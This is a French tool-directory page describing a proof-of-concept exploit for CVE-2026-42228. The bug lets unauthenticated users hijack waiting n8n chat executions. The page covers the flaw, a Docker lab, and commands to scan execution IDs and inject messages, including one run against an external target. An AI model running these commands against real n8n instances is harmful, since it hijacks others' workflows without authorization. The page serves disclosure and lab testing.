Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42228 — Preuve de concept d'exploitation pour CVE-2026-42228, une vulnérabilité de détournement d'exécution de chat non authentifiée dans n8n, avec des scripts automatisés de scan et d'attaque. | Kitploit
Outils/GitHubGitHub/rudsarkar/cve-2026-42228
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubrudsarkar/cve-2026-42228

CVE-2026-42228

Preuve de concept d'exploitation pour CVE-2026-42228, une vulnérabilité de détournement d'exécution de chat non authentifiée dans n8n, avec des scripts automatisés de scan et d'attaque.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GHSA-f77h-j2v7-g6mw — Détournement d'exécution de chat non authentifié dans n8n

CVE: CVE-2026-42228
Gravité: Élevée
Versions concernées: n8n < 1.123.32
Corrigé dans: n8n 1.123.32 / 2.17.4 / 2.18.1


Résumé de la vulnérabilité

chat-service.ts :: startSession() accepte un executionId dans la chaîne de requête WebSocket et vérifie uniquement que l'exécution existe dans la base de données. Il ne vérifie jamais que l'appelant est autorisé à accéder à cette exécution.

Un attaquant non authentifié qui connaît (ou peut énumérer) un identifiant d'exécution numérique valide pour une exécution dans l'état en attente peut :

  1. Se connecter au WebSocket /chat sans informations d'identification.
  2. Recevoir l'invite en attente affichée à un utilisateur légitime.
  3. Injecter une entrée de chat arbitraire qui reprend — et détourne — le workflow.

Conditions préalables :

  • Un workflow de chat hébergé public avec Authentification = Aucune est actif.
  • Au moins une exécution est actuellement dans l'état waiting.
  • L'attaquant peut deviner ou énumérer l'identifiant d'exécution numérique (entiers séquentiels).

Configuration du laboratoire

Prérequis

  • Docker ≥ 24 avec Compose v2
  • Port 5678 libre sur localhost

Configuration en une commande

root@kitploit:~
chmod +x exploit.sh
./exploit.sh setup

Cette commande récupère n8nio/n8n:1.123.22 (dernière version affectée), construit l'image de l'attaquant et démarre la cible vulnérable à http://localhost:5678.


Procédure d'exploitation de bout en bout

1. Configurer la cible vulnérable

  1. Ouvrez http://localhost:5678 et terminez l'assistant de configuration (n'importe quelles informations d'identification).
  2. Créez un nouveau workflow.
  3. Ajoutez un nœud Chat Trigger → définissez Authentification = Aucune.
  4. Ajoutez un nœud Wait (ou tout nœud qui suspend l'exécution pour une entrée utilisateur) après le déclencheur.
  5. Activez le workflow.

2. Déclencher une exécution en attente

Ouvrez l'URL de chat publique affichée dans le nœud Chat Trigger et envoyez un message. L'exécution passera à l'état en attente, suspendue en attendant la prochaine réponse du chat.

3. Rechercher des exécutions en attente (non authentifié)

root@kitploit:~
./exploit.sh scan
# ou spécifiez une plage :
./exploit.sh scan 1 500

Sortie attendue lorsqu'une exécution vulnérable est trouvée :

root@kitploit:~
[+] WAITING execution found! exec_id=7
    Server said: 'n8n|continue'
    Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
    [!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'

4. Attaquer directement un identifiant d'exécution connu

root@kitploit:~
./exploit.sh attack 7
# ou avec une charge utile personnalisée :
./exploit.sh attack 7 "message injecté personnalisé"

5. Observer le détournement

De retour dans l'éditeur n8n, le workflow reprend avec le message injecté par l'attaquant au lieu de l'entrée de l'utilisateur légitime.


Commandes Docker manuelles

root@kitploit:~
# Construire l'image de l'attaquant
docker build -t n8n-chat-hijack-poc .

# Rechercher (se connecte au réseau de laboratoire partagé)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --start-id 1 --end-id 200

# Attaquer une exécution spécifique
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --exec-id 7 --inject "PWNED"

# Contre une cible externe (aucun indicateur réseau requis)
docker run --rm n8n-chat-hijack-poc \
    --target https://n8n.example.com \
    --exec-id 42 --inject "PWNED"

Nettoyage

root@kitploit:~
./exploit.sh clean

Arrête les conteneurs et supprime les volumes (y compris la base de données SQLite).


Fichiers

FichierDescription
poc_GHSA-f77h-j2v7-g6mw.pyPoC Python autonome
Dockerfile

Références

  • GHSA-f77h-j2v7-g6mw
  • Journal des modifications de la version 1.123.32 de n8n
Télécharger l’outil
Image du conteneur de l'attaquant
docker-compose.ymlLaboratoire complet : n8n vulnérable + attaquant
exploit.shScript d'assistance pour les opérations courantes